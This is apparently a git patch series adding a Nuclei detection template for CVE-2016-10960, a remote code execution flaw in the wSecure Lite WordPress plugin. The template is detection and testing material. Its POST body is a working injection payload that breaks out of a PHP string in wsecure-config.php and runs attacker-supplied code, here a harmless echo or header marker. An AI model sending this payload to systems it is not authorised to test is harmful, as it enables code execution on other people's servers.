From 1af27d9260266eb7e5f27382a832ede96cbae7ef Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Thu, 15 Jul 2021 09:41:14 +0700
Subject: [PATCH 1/5] Create CVE-2016-10960.yaml

---
 CVE-2016-10960.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 CVE-2016-10960.yaml

diff --git a/CVE-2016-10960.yaml b/CVE-2016-10960.yaml
new file mode 100644
index 0000000000..3110e9b2eb
--- /dev/null
+++ b/CVE-2016-10960.yaml
@@ -0,0 +1,25 @@
+id: CVE-2016-10960
+
+info:
+  name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
+  author: daffainfo
+  severity: critical
+  description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
+  tags: cve,cve2016,wordpress,wp-plugin,rce
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
+    body: 'wsecure_action=update&publish=";} echo "Hello, world."; class WSecureConfig2 {var $test="'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Hello, world."
+        condition: and
+      - type: status
+        status:
+          - 200

From fb1f67ce26b0176e87ccc0ceb861d178c31ab398 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Thu, 15 Jul 2021 14:21:17 +0530
Subject: [PATCH 2/5] Rename CVE-2016-10960.yaml to
 cves/2016/CVE-2016-10960.yaml

---
 CVE-2016-10960.yaml => cves/2016/CVE-2016-10960.yaml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename CVE-2016-10960.yaml => cves/2016/CVE-2016-10960.yaml (100%)

diff --git a/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml
similarity index 100%
rename from CVE-2016-10960.yaml
rename to cves/2016/CVE-2016-10960.yaml

From 0c4a223fa0a19d54ed25bf9a758f39976db198f5 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Fri, 16 Jul 2021 11:13:17 +0530
Subject: [PATCH 3/5] Update CVE-2016-10960.yaml

---
 cves/2016/CVE-2016-10960.yaml | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml
index 3110e9b2eb..2894158ab8 100644
--- a/cves/2016/CVE-2016-10960.yaml
+++ b/cves/2016/CVE-2016-10960.yaml
@@ -5,7 +5,10 @@ info:
   author: daffainfo
   severity: critical
   description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
-  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
+  reference: |
+    - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
+    - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
   tags: cve,cve2016,wordpress,wp-plugin,rce
 
 requests:

From 429bb01311ea967964cf2920178ac05cc3cd641a Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Fri, 16 Jul 2021 17:46:33 +0530
Subject: [PATCH 4/5] Update CVE-2016-10960.yaml

---
 cves/2016/CVE-2016-10960.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml
index 2894158ab8..eeea3b13d7 100644
--- a/cves/2016/CVE-2016-10960.yaml
+++ b/cves/2016/CVE-2016-10960.yaml
@@ -15,13 +15,13 @@ requests:
   - method: POST
     path:
       - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
-    body: 'wsecure_action=update&publish=";} echo "Hello, world."; class WSecureConfig2 {var $test="'
+    body: 'wsecure_action=update&publish=";} echo "Hello, world CVE-2016-10960."; class WSecureConfig2 {var $test="'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "Hello, world."
+          - "Hello, world CVE-2016-10960."
         condition: and
       - type: status
         status:

From eaba7dc5defcf9fbc6db5818c8c53aa4e121f6ad Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Fri, 16 Jul 2021 17:54:37 +0530
Subject: [PATCH 5/5] Update CVE-2016-10960.yaml

---
 cves/2016/CVE-2016-10960.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml
index eeea3b13d7..68f7e2616c 100644
--- a/cves/2016/CVE-2016-10960.yaml
+++ b/cves/2016/CVE-2016-10960.yaml
@@ -15,14 +15,15 @@ requests:
   - method: POST
     path:
       - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
-    body: 'wsecure_action=update&publish=";} echo "Hello, world CVE-2016-10960."; class WSecureConfig2 {var $test="'
+    body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "Hello, world CVE-2016-10960."
+          - "Nuclei: CVE-2016-10960"
         condition: and
+        part: header
       - type: status
         status:
           - 200